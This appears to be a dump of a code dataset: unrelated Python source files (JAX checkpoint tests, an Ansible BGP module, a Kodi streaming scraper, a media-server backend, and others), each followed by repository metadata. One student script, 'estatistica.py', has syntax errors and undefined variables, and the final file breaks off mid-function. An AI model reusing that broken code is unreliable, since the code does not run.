global_mesh = Mesh(mesh_devices, axis_names)
return global_mesh
class CheckpointTest(jtu.JaxTestCase):
def test_checkpointing(self):
global_mesh = create_global_mesh((4, 2), ('x', 'y'))
global_input_shape = (8, 2)
mesh_axes = P('x', 'y')
num = util.prod(global_input_shape)
# First GDA
global_input_data1 = np.arange(num).reshape(global_input_shape)
def cb1(index):
return global_input_data1[index]
gda1 = GlobalDeviceArray.from_callback(global_input_shape, global_mesh,
mesh_axes, cb1)
ckpt_dir1 = pathlib.Path(self.create_tempdir('first').full_path)
# Second GDA
global_input_data2 = np.arange(num, num + num).reshape(global_input_shape)
def cb2(index):
return global_input_data2[index]
gda2 = GlobalDeviceArray.from_callback(global_input_shape, global_mesh,
mesh_axes, cb2)
ckpt_dir2 = pathlib.Path(self.create_tempdir('second').full_path)
# Third GDA
def cb3(index):
return np.array([])
global_mesh1d = create_global_mesh((8,), ('x',))
gda3 = GlobalDeviceArray.from_callback((0,), global_mesh1d, P(None), cb3)
ckpt_dir3 = pathlib.Path(self.create_tempdir('third').full_path)
ckpt_paths = [str(ckpt_dir1), str(ckpt_dir2), str(ckpt_dir3)]
tspecs = jax.tree_map(serialization.get_tensorstore_spec, ckpt_paths)
serialization.run_serialization([gda1, gda2, gda3], tspecs)
m1, m2, m3 = serialization.run_deserialization(
[global_mesh, global_mesh, global_mesh1d],
[mesh_axes, P('x'), P(None)],
tspecs)
self.assertArraysEqual(m1.local_shards[0].data.to_py(),
np.array([[0], [2]]))
self.assertArraysEqual(m1.local_shards[1].data.to_py(),
np.array([[1], [3]]))
self.assertEqual(m1.local_shards[0].data.shape, (2, 1))
self.assertEqual(m1.dtype, np.int32)
self.assertArraysEqual(m2.local_shards[0].data.to_py(),
np.array([[16, 17], [18, 19]]))
self.assertArraysEqual(m2.local_shards[1].data.to_py(),
np.array([[16, 17], [18, 19]]))
self.assertEqual(m2.local_shards[0].data.shape, (2, 2))
self.assertEqual(m2.dtype, np.int32)
for i, s in enumerate(m3.local_shards):
self.assertEqual(s.index, (slice(None),))
self.assertEqual(s.replica_id, i)
self.assertArraysEqual(s.data.to_py(), np.array([]))
self.assertEqual(m3.dtype, np.float32)
def test_checkpointing_with_bigger_shape(self):
global_mesh = create_global_mesh((2, 2), ('x', 'y'))
global_input_shape = (8, 2)
num = util.prod(global_input_shape)
# First GDA
global_input_data1 = np.arange(num).reshape(global_input_shape)
def cb1(index):
return global_input_data1[index]
gda1 = GlobalDeviceArray.from_callback(global_input_shape, global_mesh,
P('x', 'y'), cb1)
ckpt_dir1 = pathlib.Path(self.create_tempdir('first').full_path)
ckpt_paths = [str(ckpt_dir1)]
tspecs = jax.tree_map(serialization.get_tensorstore_spec, ckpt_paths)
serialization.run_serialization([gda1], tspecs)
m1, = serialization.run_deserialization(
[create_global_mesh((4, 2), ('x', 'y'))],
[P('x', 'y')],
tspecs,
[(12, 2)],
)
expected_data = {
0: np.array([[0], [2], [4]]),
1: np.array([[1], [3], [5]]),
2: np.array([[6], [8], [10]]),
3: np.array([[7], [9], [11]]),
4: np.array([[12], [14], [0]]),
5: np.array([[13], [15], [0]]),
6: np.array([[0], [0], [0]]),
7: np.array([[0], [0], [0]]),
}
for l in m1.local_shards:
self.assertArraysEqual(l.data.to_py(), expected_data[l.device.id])
def test_spec_has_metadata(self):
spec = {
'a': {
'b': 1,
'c': 2,
},
'd': 3,
'e': {
'a': 2,
'metadata': 3
},
'f': 4
}
self.assertTrue(serialization._spec_has_metadata(spec))
self.assertTrue(
serialization._spec_has_metadata({
'driver': 'zarr',
'kvstore': 'gfile',
'metadata': {
'chunks': 4,
'shape': (32, 64)
},
'one_more': 'thing'
}))
def test_spec_has_no_metadata(self):
spec = {
'a': {
'b': 1,
'c': 2,
},
'd': 3,
'e': {
'a': 2,
},
'f': 4
}
self.assertFalse(serialization._spec_has_metadata(spec))
def test_empty_spec_has_no_metadata(self):
spec = {}
self.assertFalse(serialization._spec_has_metadata(spec))
if __name__ == '__main__':
absltest.main(testLoader=jtu.JaxTestLoader())
| [
"[email protected]"
]
| |
1958e4fd3cd5234c86f6dd7f259d43da2a520bd3 | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03032/s283156387.py | 473d0ed84ab4c0f25eab299ea36e78724919eff4 | []
| no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 400 | py | n,k = map(int,input().split())
lis = list(map(int,input().split()))
ans = 0
for i in range(n):
for j in range(n-i+1):
num = lis[:i]
if j > 0:
num += lis[-j:]
if len(num) <= k:
cnt = min(len(num),k-len(num))
num.sort()
for h in range(cnt):
num[h] = max(0,num[h])
ans = max(ans,sum(num))
print(ans) | [
"[email protected]"
]
| |
582302c3619958b67faf74202cdf4418340616c1 | b2f8c41358f6c6f4ce78328695a7b4f96adf806b | /staff_crm/apps.py | c4f1bce309a4b15bd048c1a4cfc2964dc43f754b | []
| no_license | funsojoba/staff_management_api | 6f472ea0a53095b6860969cf88f87b50fea69729 | 792bc652ec61e3f0d16bab1ff36cf72643161dbe | refs/heads/main | 2023-05-24T04:45:20.895495 | 2021-06-13T19:45:07 | 2021-06-13T19:45:07 | 373,336,004 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 149 | py | from django.apps import AppConfig
class StaffCrmConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'staff_crm'
| [
"[email protected]"
]
| |
2b1c888ed19da3073b1fcc9a4ad2599f84ed38f0 | 64bf39b96a014b5d3f69b3311430185c64a7ff0e | /intro-ansible/venv3/lib/python3.8/site-packages/ansible_collections/cisco/ios/plugins/module_utils/network/ios/providers/cli/config/bgp/address_family.py | 0e0ce1ab78fecbd074f6c23d7f5f4d6866007720 | [
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later",
"LicenseRef-scancode-unknown-license-reference"
]
| permissive | SimonFangCisco/dne-dna-code | 7072eba7da0389e37507b7a2aa5f7d0c0735a220 | 2ea7d4f00212f502bc684ac257371ada73da1ca9 | refs/heads/master | 2023-03-10T23:10:31.392558 | 2021-02-25T15:04:36 | 2021-02-25T15:04:36 | 342,274,373 | 0 | 0 | MIT | 2021-02-25T14:39:22 | 2021-02-25T14:39:22 | null | UTF-8 | Python | false | false | 5,305 | py | #
# (c) 2019, Ansible by Red Hat, inc
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
#
from __future__ import absolute_import, division, print_function
__metaclass__ = type
import re
from ansible.module_utils.six import iteritems
from ansible_collections.ansible.netcommon.plugins.module_utils.network.common.utils import (
to_list,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.providers.providers import (
CliProvider,
)
from ansible_collections.cisco.ios.plugins.module_utils.network.ios.providers.cli.config.bgp.neighbors import (
AFNeighbors,
)
from ansible.module_utils.common.network import to_netmask
class AddressFamily(CliProvider):
def render(self, config=None):
commands = list()
safe_list = list()
router_context = "router bgp %s" % self.get_value("config.bgp_as")
context_config = None
for item in self.get_value("config.address_family"):
context = "address-family %s" % item["afi"]
if item["safi"] != "unicast":
context += " %s" % item["safi"]
context_commands = list()
if config:
context_path = [router_context, context]
context_config = self.get_config_context(
config, context_path, indent=1
)
for key, value in iteritems(item):
if value is not None:
meth = getattr(self, "_render_%s" % key, None)
if meth:
resp = meth(item, context_config)
if resp:
context_commands.extend(to_list(resp))
if context_commands:
commands.append(context)
commands.extend(context_commands)
commands.append("exit-address-family")
safe_list.append(context)
if self.params["operation"] == "replace":
if config:
resp = self._negate_config(config, safe_list)
commands.extend(resp)
return commands
def _negate_config(self, config, safe_list=None):
commands = list()
matches = re.findall(r"(address-family .+)$", config, re.M)
for item in set(matches).difference(safe_list):
commands.append("no %s" % item)
return commands
def _render_auto_summary(self, item, config=None):
cmd = "auto-summary"
if item["auto_summary"] is False:
cmd = "no %s" % cmd
if not config or cmd not in config:
return cmd
def _render_synchronization(self, item, config=None):
cmd = "synchronization"
if item["synchronization"] is False:
cmd = "no %s" % cmd
if not config or cmd not in config:
return cmd
def _render_networks(self, item, config=None):
commands = list()
safe_list = list()
for entry in item["networks"]:
network = entry["prefix"]
cmd = "network %s" % network
if entry["masklen"]:
cmd += " mask %s" % to_netmask(entry["masklen"])
network += " mask %s" % to_netmask(entry["masklen"])
if entry["route_map"]:
cmd += " route-map %s" % entry["route_map"]
network += " route-map %s" % entry["route_map"]
safe_list.append(network)
if not config or cmd not in config:
commands.append(cmd)
if self.params["operation"] == "replace":
if config:
matches = re.findall(r"network (.*)", config, re.M)
for entry in set(matches).difference(safe_list):
commands.append("no network %s" % entry)
return commands
def _render_redistribute(self, item, config=None):
commands = list()
safe_list = list()
for entry in item["redistribute"]:
option = entry["protocol"]
cmd = "redistribute %s" % entry["protocol"]
if entry["id"] and entry["protocol"] in (
"ospf",
"ospfv3",
"eigrp",
):
cmd += " %s" % entry["id"]
option += " %s" % entry["id"]
if entry["metric"]:
cmd += " metric %s" % entry["metric"]
if entry["route_map"]:
cmd += " route-map %s" % entry["route_map"]
if not config or cmd not in config:
commands.append(cmd)
safe_list.append(option)
if self.params["operation"] == "replace":
if config:
matches = re.findall(
r"redistribute (\S+)(?:\s*)(\d*)", config, re.M
)
for i in range(0, len(matches)):
matches[i] = " ".join(matches[i]).strip()
for entry in set(matches).difference(safe_list):
commands.append("no redistribute %s" % entry)
return commands
def _render_neighbors(self, item, config):
""" generate bgp neighbor configuration
"""
return AFNeighbors(self.params).render(
config, nbr_list=item["neighbors"]
)
| [
"[email protected]"
]
| |
be4034b96252307d6e130988d30401bb65314765 | d7f4596491b47d74689d8731c9d0f10b51b5693f | /fastcampus/코딩테스트_면접/02. 알고리즘 이론/graph.py | 6b593b8ff449f75e4ad3cf2229502620e69e8a70 | []
| no_license | wonjongah/DataStructure_CodingTest | 797b62d48321abf065f1507f14a3ed0902f48399 | 9d28c2aefbba2486f6158c066fd249fca3904346 | refs/heads/main | 2023-06-04T15:54:30.048106 | 2021-06-30T14:09:41 | 2021-06-30T14:09:41 | 327,008,361 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 259 | py | graph = dict()
graph['A'] = ['B', 'C']
graph['B'] = ['A', 'D']
graph['C'] = ['A', 'G', 'H', 'I']
graph['D'] = ['B', 'E', 'F']
graph['E'] = ['D']
graph['F'] = ['D']
graph['G'] = ['C']
graph['H'] = ['C']
graph['I'] = ['C', 'J']
graph['J'] = ['I']
print(graph) | [
"[email protected]"
]
| |
59fedb17f8722439c3814f478d134f626b0a4c4a | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/48/usersdata/82/15966/submittedfiles/estatistica.py | 31ad4a0026cf93a6236f0ea7646c0afd92d24f53 | []
| no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 794 | py | # -*- coding: utf-8 -*-
from __future__ import division
def media(lista):
soma = 0
for i in range(0,len(lista),1):
soma = soma + lista[i]
media = soma/len(lista)
return media
a=[]
b=[]
n= input ('Digite a quantidade de elementos:')
for i in range (0,n,1):
a.append(input('Digite um elemento:'))
for i in range (0,n,1):
b.append(input('Digite um elemento:'))
media_a = media(a)
media_b = media(b)
print('%.2f' %media_a)
print('%.2f' %media_b)
#Por último escreva o programa principal, que pede a entrada e chama as funções criadas.
def desviopadrao(lista):
soma=0
for j in range (0,n,1):
soma=soma+(l[j]-media)**2
s=((1/(n-1))*soma)**(1/2)
print('%.2f' %media_a)
print('%2.f' desviopadrao_a)
print('%.2f' %media_b)
print('%2.f' %desviopadrao_b)
| [
"[email protected]"
]
| |
5941ae15de8d50faefafcad8fed4e9d17d948e27 | c7a6f8ed434c86b4cdae9c6144b9dd557e594f78 | /ECE364/.PyCharm40/system/python_stubs/348993582/gtk/_gtk/MountOperation.py | d327e51af64f413a5022e8715f458a73a8e61d5b | []
| no_license | ArbalestV/Purdue-Coursework | 75d979bbe72106975812b1d46b7d854e16e8e15e | ee7f86145edb41c17aefcd442fa42353a9e1b5d1 | refs/heads/master | 2020-08-29T05:27:52.342264 | 2018-04-03T17:59:01 | 2018-04-03T17:59:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,919 | py | # encoding: utf-8
# module gtk._gtk
# from /usr/lib64/python2.6/site-packages/gtk-2.0/gtk/_gtk.so
# by generator 1.136
# no doc
# imports
import atk as __atk
import gio as __gio
import gobject as __gobject
import gobject._gobject as __gobject__gobject
class MountOperation(__gio.MountOperation):
"""
Object GtkMountOperation
Properties from GtkMountOperation:
parent -> GtkWindow: Parent
The parent window
is-showing -> gboolean: Is Showing
Are we showing a dialog
screen -> GdkScreen: Screen
The screen where this window will be displayed.
Signals from GMountOperation:
ask-password (gchararray, gchararray, gchararray, GAskPasswordFlags)
ask-question (gchararray, GStrv)
reply (GMountOperationResult)
aborted ()
show-processes (gchararray, GArray, GStrv)
Properties from GMountOperation:
username -> gchararray: Username
The user name
password -> gchararray: Password
The password
anonymous -> gboolean: Anonymous
Whether to use an anonymous user
domain -> gchararray: Domain
The domain of the mount operation
password-save -> GPasswordSave: Password save
How passwords should be saved
choice -> gint: Choice
The users choice
Signals from GObject:
notify (GParam)
"""
def get_parent(self, *args, **kwargs): # real signature unknown
pass
def get_screen(self, *args, **kwargs): # real signature unknown
pass
def is_showing(self, *args, **kwargs): # real signature unknown
pass
def set_parent(self, *args, **kwargs): # real signature unknown
pass
def set_screen(self, *args, **kwargs): # real signature unknown
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
__gtype__ = None # (!) real value is ''
| [
"[email protected]"
]
| |
e260d0d50c7d74e84cf1062a5c25ccbe38c4e375 | 90360a1de1c19ab217ff0fceaaa3140cad4ddaa5 | /plugin.video.salts/scrapers/icefilms_scraper.py | 9fffbf94a63ac44d5c3ce8d39de54d0ed860f31e | []
| no_license | trickaz/tknorris-beta-repo | 934cbbf089e12607fe991d13977f0d8a61354f01 | c4b82ef1b402514ef661bcc669852c44578fcaa0 | refs/heads/master | 2021-01-22T14:25:19.271493 | 2014-10-17T06:19:39 | 2014-10-17T06:19:39 | 25,358,146 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,462 | py | """
SALTS XBMC Addon
Copyright (C) 2014 tknorris
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import scraper
import re
import urllib
import urlparse
import HTMLParser
import string
import xbmcaddon
from salts_lib.db_utils import DB_Connection
from salts_lib import log_utils
from salts_lib.constants import VIDEO_TYPES
from salts_lib.constants import QUALITIES
QUALITY_MAP = {'HD 720P': QUALITIES.HD, 'DVDRIP / STANDARD DEF': QUALITIES.HIGH}
#BROKEN_RESOLVERS = ['180UPLOAD', 'HUGEFILES', 'VIDPLAY']
BROKEN_RESOLVERS = []
BASE_URL='http://www.icefilms.info'
class IceFilms_Scraper(scraper.Scraper):
base_url=BASE_URL
def __init__(self, timeout=scraper.DEFAULT_TIMEOUT):
self.timeout=timeout
self.db_connection = DB_Connection()
self.base_url = xbmcaddon.Addon().getSetting('%s-base_url' % (self.get_name()))
@classmethod
def provides(cls):
return frozenset([VIDEO_TYPES.TVSHOW, VIDEO_TYPES.SEASON, VIDEO_TYPES.EPISODE, VIDEO_TYPES.MOVIE])
@classmethod
def get_name(cls):
return 'IceFilms'
def resolve_link(self, link):
url, query = link.split('?', 1)
data = urlparse.parse_qs(query, True)
url = urlparse.urljoin(self.base_url, url)
html = self._http_get(url, data=data, cache_limit=0)
match = re.search('url=(.*)', html)
if match:
url=urllib.unquote_plus(match.group(1))
if url.upper() in BROKEN_RESOLVERS:
url = None
return url
def format_source_label(self, item):
label='[%s] %s%s (%s/100) ' % (item['quality'], item['label'], item['host'], item['rating'])
return label
def get_sources(self, video):
source_url=self.get_url(video)
sources = []
if source_url:
try:
url = urlparse.urljoin(self.base_url, source_url)
html = self._http_get(url, cache_limit=.5)
pattern='<iframe id="videoframe" src="([^"]+)'
match = re.search(pattern, html)
frame_url = match.group(1)
url = urlparse.urljoin(self.base_url, frame_url)
html = self._http_get(url, cache_limit=.5)
match=re.search('lastChild\.value="([^"]+)"', html)
secret=match.group(1)
match=re.search('"&t=([^"]+)', html)
t=match.group(1)
pattern='<div class=ripdiv>(.*?)</div>'
for container in re.finditer(pattern, html):
fragment=container.group(0)
match=re.match('<div class=ripdiv><b>(.*?)</b>', fragment)
if match:
quality=QUALITY_MAP[match.group(1).upper()]
else:
quality=None
pattern='onclick=\'go\((\d+)\)\'>([^<]+)(<span.*?)</a>'
for match in re.finditer(pattern, fragment):
link_id, label, host_fragment = match.groups()
source = {'multi-part': False, 'quality': quality, 'class': self, 'label': label, 'rating': None, 'views': None, 'direct': False}
host=re.sub('(<[^>]+>|</span>)','',host_fragment)
source['host']=host.lower()
if host.upper() in BROKEN_RESOLVERS:
continue
url = '/membersonly/components/com_iceplayer/video.phpAjaxResp.php?id=%s&s=999&iqs=&url=&m=-999&cap=&sec=%s&t=%s' % (link_id, secret, t)
source['url']=url
sources.append(source)
except Exception as e:
log_utils.log('Failure (%s) during icefilms get sources: |%s|' % (str(e), video))
return sources
def get_url(self, video):
return super(IceFilms_Scraper, self)._default_get_url(video)
def search(self, video_type, title, year):
if video_type==VIDEO_TYPES.MOVIE:
url = urlparse.urljoin(self.base_url, '/movies/a-z/')
else:
url = urlparse.urljoin(self.base_url,'/tv/a-z/')
if title.upper().startswith('THE '):
first_letter=title[4:5]
elif title.upper().startswith('A '):
first_letter = title[2:3]
elif title[:1] in string.digits:
first_letter='1'
else:
first_letter=title[:1]
url = url + first_letter.upper()
html = self._http_get(url, cache_limit=.25)
h = HTMLParser.HTMLParser()
html = unicode(html, 'windows-1252')
html = h.unescape(html)
norm_title = self._normalize_title(title)
pattern = 'class=star.*?href=([^>]+)>(.*?)(?:\s*\((\d+)\))?</a>'
results=[]
for match in re.finditer(pattern, html, re.DOTALL):
url, match_title, match_year = match.groups('')
if norm_title in self._normalize_title(match_title) and (not year or not match_year or year == match_year):
result={'url': url, 'title': match_title, 'year': match_year}
results.append(result)
return results
def _get_episode_url(self, show_url, video):
episode_pattern = 'href=(/ip\.php[^>]+)>%sx0?%s\s+' % (video.season, video.episode)
title_pattern='class=star>\s*<a href=([^>]+)>(?:\d+x\d+\s+)+([^<]+)'
return super(IceFilms_Scraper, self)._default_get_episode_url(show_url, video, episode_pattern, title_pattern)
def _http_get(self, url, data=None, cache_limit=8):
return super(IceFilms_Scraper, self)._cached_http_get(url, self.base_url, self.timeout, data=data, cache_limit=cache_limit)
| [
"[email protected]"
]
| |
1c9798c3ad320b1268eb7c05f3413c11de8cc2c4 | 74d6b36ae48a2153fa35c56d2448c05b64c72bf8 | /contests/550/A-two-substrings.py | 1cd1bdb89a05efe3c401c3f0559cc701f7386b67 | []
| no_license | hariharanragothaman/codeforces-solutions | 205ec8b717e8eb3e4d700fc413159c49a582cff6 | 1566a9187cc16e1461ddb55dbcc393493604dfcd | refs/heads/master | 2023-06-24T11:33:52.255437 | 2021-07-25T14:33:52 | 2021-07-25T14:33:52 | 282,783,158 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,935 | py | """
Given a string, we need to find , if it contains AB, and BA seperately and they are non-overlapping
The strings can be in any order.
"""
from typing import List
p = 31
m = 10 ** 9 + 9
def compute_hash(s):
n = len(s)
power_mod = [1]
for i in range(n):
power_mod.append((power_mod[-1] * p) % m)
hash_values = [0] * (n + 1)
for i in range(n):
hash_values[i + 1] = (
hash_values[i] + (ord(s[i]) - ord("a") + 1) * power_mod[i]
) % m
def count_occurences(text, pattern):
"""
:param pattern: Pattern Text
:param text: I/P text
:return:
"""
text_length = len(text)
pattern_length = len(pattern)
power_mod = [1]
for i in range(text_length):
power_mod.append((power_mod[-1] * p) % m)
# print(f"The power mod is: {[power_mod]}")
hash_values = [0] * (text_length + 1)
for i in range(text_length):
hash_values[i + 1] = (
hash_values[i] + (ord(text[i]) - ord("a") + 1) * power_mod[i]
) % m
# print("The string hash values are:", hash_values)
pattern_hash = 0
for i in range(pattern_length):
pattern_hash += ((ord(pattern[i]) - ord("a") + 1) * power_mod[i]) % m
# print("The pattern hash is:", pattern_hash)
occurences = []
i = 0
while i + pattern_length - 1 < text_length:
field_hash = (hash_values[i + pattern_length] - hash_values[i] + m) % m
if field_hash == pattern_hash * power_mod[i] % m:
occurences.append(i)
i += 1
return occurences
def solve(s):
"""
AB and BA are defined strings of length 2
We can do rabin-karp, to get this.
So find where all AB is - ab_result
find where all BA is - ba_result
AB, BA occurence - ensure it's not overalling
:return:
"""
# Let's try a bruteforce method first - This will TLE
def helper(s, char) -> List:
n = len(s)
res = []
start = 0
while s:
idx = s.find(char, start, n)
if idx != -1:
res.append(idx)
start += 2
elif idx == -1:
break
return res
# result1 = helper(s, char='AB')
# result2 = helper(s, char='BA')
result1 = count_occurences(s, pattern="AB")
result2 = count_occurences(s, pattern="BA")
# We now have to basically find if we can find 2 non-overalapping intervals
a = []
b = []
if result1 and result2:
if result1[0] < result2[0]:
a, b = result1, result2
else:
a, b = result2, result1
for i, val1 in enumerate(a):
for j, val2 in enumerate(b):
if abs(val1 - val2) >= 2:
return True
return False
else:
return False
if __name__ == "__main__":
s = input()
res = solve(s)
if res:
print("YES")
else:
print("NO")
| [
"[email protected]"
]
| |
fc6ec366cc16a9f609e3910d19770d58645a59b8 | eb3683f9127befb9ef96d8eb801206cf7b84d6a7 | /stypy/invokation/type_rules/modules/numpy/lib/ufunclike/ufunclike__type_modifiers.py | 8a0fa8e78c44a7d76c174b17b2107251eb822674 | []
| no_license | ComputationalReflection/stypy | 61ec27333a12f76ac055d13f8969d3e0de172f88 | be66ae846c82ac40ba7b48f9880d6e3990681a5b | refs/heads/master | 2021-05-13T18:24:29.005894 | 2018-06-14T15:42:50 | 2018-06-14T15:42:50 | 116,855,812 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 373 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import numpy
from stypy.invokation.handlers import call_utilities
class TypeModifiers:
@staticmethod
def fix(localization, proxy_obj, arguments):
if call_utilities.is_numpy_array(arguments[0]):
return arguments[0]
else:
return call_utilities.create_numpy_array(arguments[0])
| [
"[email protected]"
]
| |
dbf30296d71e7bf60831a0c340e730a93a7d7a5c | c78d25a2ea56f012da3381d7245c3e08556129e1 | /coherence/backends/radiotime_storage.py | 1f2c5d69ba48ac3beee20a08759cb96b1a85c6c1 | [
"MIT"
]
| permissive | Python3pkg/Cohen | 556ad3952136fc2eafda99202a7280c2ece2477e | 14e1e9f5b4a5460033692b30fa90352320bb7a4e | refs/heads/master | 2021-01-21T17:13:58.602576 | 2017-05-21T08:33:16 | 2017-05-21T08:33:16 | 91,943,281 | 1 | 0 | null | 2017-05-21T08:32:55 | 2017-05-21T08:32:55 | null | UTF-8 | Python | false | false | 7,113 | py | # Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php
# an internet radio media server for the Coherence UPnP Framework
# based on the radiotime (http://radiotime.com) catalog service
# Copyright 2007, Frank Scholz <[email protected]>
# Copyright 2009-2010, Jean-Michel Sizun <jmDOTsizunATfreeDOTfr>
from lxml import etree
from twisted.python.failure import Failure
from coherence.upnp.core import utils
from coherence.upnp.core import DIDLLite
from coherence.upnp.core.DIDLLite import Resource
from coherence.backend import BackendItem, Container, LazyContainer, AbstractBackendStore
OPML_BROWSE_URL = 'http://opml.radiotime.com/Browse.ashx'
# we only handle mp3 audio streams for now
DEFAULT_FORMAT = "mp3"
DEFAULT_MIMETYPE = "audio/mpeg"
# TODO : extend format handling using radiotime API
class RadiotimeAudioItem(BackendItem):
logCategory = 'radiotime'
def __init__(self, outline):
BackendItem.__init__(self)
self.preset_id = outline.get('preset_id')
self.name = outline.get('text')
self.mimetype = DEFAULT_MIMETYPE
self.stream_url = outline.get('URL')
self.image = outline.get('image')
#self.location = PlaylistStreamProxy(self.stream_url)
#self.url = self.stream_url
self.item = None
def replace_by (self, item):
# do nothing: we suppose the replacement item is the same
return
def get_item(self):
if self.item == None:
upnp_id = self.get_id()
upnp_parent_id = self.parent.get_id()
self.item = DIDLLite.AudioBroadcast(upnp_id, upnp_parent_id, self.name)
self.item.albumArtURI = self.image
res = Resource(self.stream_url, 'http-get:*:%s:%s' % (self.mimetype,
';'.join(('DLNA.ORG_PN=MP3',
'DLNA.ORG_CI=0',
'DLNA.ORG_OP=01',
'DLNA.ORG_FLAGS=01700000000000000000000000000000'))))
res.size = 0 # None
self.item.res.append(res)
return self.item
def get_path(self):
return self.url
def get_id(self):
return self.storage_id
class RadiotimeStore(AbstractBackendStore):
logCategory = 'radiotime'
implements = ['MediaServer']
def __init__(self, server, **kwargs):
AbstractBackendStore.__init__(self, server, **kwargs)
self.name = kwargs.get('name', 'radiotimeStore')
self.refresh = int(kwargs.get('refresh', 60)) * 60
self.browse_url = self.config.get('browse_url', OPML_BROWSE_URL)
self.partner_id = self.config.get('partner_id', 'TMe3Cn6v')
self.username = self.config.get('username', None)
self.locale = self.config.get('locale', 'en')
self.serial = server.uuid
# construct URL for root menu
if self.username is not None:
identification_param = "username=%s" % self.username
else:
identification_param = "serial=%s" % self.serial
formats_value = DEFAULT_FORMAT
root_url = "%s?partnerId=%s&%s&formats=%s&locale=%s" % (self.browse_url, self.partner_id, identification_param, formats_value, self.locale)
# set root item
root_item = LazyContainer(None, "root", "root", self.refresh, self.retrieveItemsForOPML, url=root_url)
self.set_root_item(root_item)
self.init_completed()
def upnp_init(self):
self.current_connection_id = None
self.wmc_mapping = {'4': self.get_root_id()}
if self.server:
self.server.connection_manager_server.set_variable(0, 'SourceProtocolInfo',
['http-get:*:audio/mpeg:*',
'http-get:*:audio/x-scpls:*'],
default=True)
def retrieveItemsForOPML (self, parent, url):
def append_outline(parent, outline):
type = outline.get('type')
if type is None:
# This outline is just a classification item containing other outline elements
# the corresponding item will a static Container
text = outline.get('text')
key = outline.get('key')
external_id = None
if external_id is None and key is not None:
external_id = "%s_%s" % (parent.external_id, key)
if external_id is None:
external_id = outline_url
item = Container(parent, text)
item.external_id = external_id
item.store = parent.store
parent.add_child(item, external_id=external_id)
sub_outlines = outline.findall('outline')
for sub_outline in sub_outlines:
append_outline(item, sub_outline)
elif type == 'link':
# the corresponding item will a self-populating Container
text = outline.get('text')
outline_url = outline.get('URL')
key = outline.get('key')
guide_id = outline.get('guide_id')
external_id = guide_id
if external_id is None and key is not None:
external_id = "%s_%s" % (parent.external_id, key)
if external_id is None:
external_id = outline_url
item = LazyContainer(parent, text, external_id, self.refresh, self.retrieveItemsForOPML, url=outline_url)
parent.add_child(item, external_id=external_id)
elif type == 'audio':
item = RadiotimeAudioItem(outline)
parent.add_child(item, external_id=item.preset_id)
def got_page(result):
self.info('connection to Radiotime service successful for url %s', url)
outlines = result.findall('body/outline')
for outline in outlines:
append_outline(parent, outline)
return True
def got_error(error):
self.warning("connection to Radiotime service failed for url %s", url)
self.debug("%r", error.getTraceback())
parent.childrenRetrievingNeeded = True # we retry
return Failure("Unable to retrieve items for url %s" % url)
def got_xml_error(error):
self.warning("Data received from Radiotime service is invalid: %s", url)
#self.debug("%r", error.getTraceback())
print(error.getTraceback())
parent.childrenRetrievingNeeded = True # we retry
return Failure("Unable to retrieve items for url %s" % url)
d = utils.getPage(url, )
d.addCallback(etree.fromstring)
d.addErrback(got_error)
d.addCallback(got_page)
d.addErrback(got_xml_error)
return d
| [
"[email protected]"
]
| |
8c929fb80c63833f2b9b8f7f3d79ea501d32a8c2 | 845e3c428e18232777f17b701212dcbb1b72acc1 | /psdbCrop/psdbCropVal1PsdbFourPartsFullDRoiAlignXRoc2.py | 6c8fab7837b147654694a4a4715f353926dee333 | [
"BSD-2-Clause",
"MIT",
"LicenseRef-scancode-generic-cla"
]
| permissive | chuanxinlan/ohem-1 | dd10b2f5ff15e81ab9e42e936bb44d98e01c6795 | b7552ceb8ed1e9768e0d522258caa64b79834b54 | refs/heads/master | 2021-09-16T18:31:25.651432 | 2018-06-23T10:09:24 | 2018-06-23T10:09:24 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,010 | py | #!/usr/bin/python
import os
import numpy as np
import matplotlib.pyplot as plt
import tools._init_paths
import cPickle
from datasets.factory import get_imdb
import cv2
class EvalConfig(object):
iou_thresh = 0.5
min_width = 20
min_height = 20
# a list of type IDs
eval_type = None
# (x1, y1, x2, y2) -> (x, y, w, h) ?
transform_gt = False
transform_det = False
def read_bboxes(fin, cls, transform=False):
im_name = fin.readline().strip()
bbs = []
if im_name:
num_bbox = int(fin.readline().strip())
if num_bbox > 0:
for _ in xrange(num_bbox):
line = fin.readline().rstrip().split()
line = map(float, line)
bbs.append(line)
else:
num_bbox = -1
key = 0
bboxes = []
heades = []
for i, b in enumerate(bbs):
if min(b) >= 0:
box = b[(cls - 1) * 5: cls * 5]
head = b[(2 - 1) * 5: 2 * 5]
bboxes.append(box[1:])
